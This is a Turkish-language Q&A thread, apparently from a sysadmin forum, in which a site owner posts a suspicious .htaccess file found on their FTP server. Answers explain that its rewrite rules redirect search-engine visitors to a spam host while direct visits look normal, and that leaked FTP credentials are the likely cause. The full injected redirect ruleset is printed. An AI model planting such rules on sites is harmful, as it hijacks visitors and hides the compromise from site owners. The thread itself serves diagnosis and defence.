Şüpheli .htaccess Dosyası

20

Bu, FTP klasörlerimden birine yüklendi. Apache'ye aşina değilim, ama hala merak ediyorum - birisi bana bu dosyanın ne tür bir davranışta bulunmaya çalıştığını söyleyebilir mi? Teşekkürler!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2  security  mod-rewrite  .htaccess 
ovinophile
kaynak
1
GÜZEL! (Kötü bir şekilde ...) Temelde sitenize gelen herkesi bir arama motorundan alıyor ve SPAMMER.info'ya yönlendiriyor
KPWINC
Bu bana bir kez olmuş olsaydı. .htaccessSiteme eklenen dosya sadece beni daha fazla şaşırtmak için, üstündeki 40 boş satırlar hakkında vardı.
TRiG

Yanıtlar:

15

Bu, bir arama motorundan gelen kullanıcıları son siteye gönderir SPAMMER.info( gerçek site için soru geçmişine bakın ).

Sitenize arama motorları aracılığıyla erişmediğiniz için, sizden gizleme girişimi olan yönlendiricileri arar . Yani, doğrudan URL'ye giderseniz, her şey normal görünüyor. Ancak, bir arama motoru aracılığıyla gelirseniz, yönlendirilirsiniz.

Not: Bu , web tarayıcılarını etkilemez ( en azından googlebot ) yönlendiren başlığını ayarlamadığı için.

Michael Haren
kaynak
8

Bir arama motorundaki bir kullanıcı sitenizdeki herhangi bir sayfayı her istediğinde .info spam sitesine yönlendirilir.

Çok sinsi - normalde sadece adresi yazacağınız için yanlış bir şey fark etmeyeceksiniz.

Greg
kaynak
1
Yönlendirene baktığından, bir arama motorundan gelen tıklamaları yönlendirmez mi?
Google'dan gelen bağlantıları da etkilemiyor mu? Örneğin, OP'nin Google'da sitesini aradınız, tıklayın ve Google'dan geldiğinizden beri yönlendirildiniz mi?
Evet, sadece arama motorlarından Bağlantılar (benim cevaben gibi) fakat değil motoru tarayıcılarını / botlara arayın. Bu cevap güncellendi, bu yüzden şimdi doğru. Başlangıçta bunun sadece botlara uygulandığını belirtti.
Michael Haren
1

daha fazla eklemek için - büyük olasılıkla ftp kimlik bilgileriniz sızdırıldı. belki onları filezilla / total commander vb kaydedilmişti. Bunları çalmak ve sonra 'dolaşmak' - ftp hesaplarına oturum açmak, index.php / html'ye kötü amaçlı javascript eklemek veya benzer yeniden yazma dosyaları koymak için birçok kötü amaçlı yazılım var.

PQD
kaynak
Bu sorunla karşı karşıyayım. Diğer .htaccess dosyası değiştirildikten sonraki gün, dahili sunucu hatasına neden olur.
vnix27
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.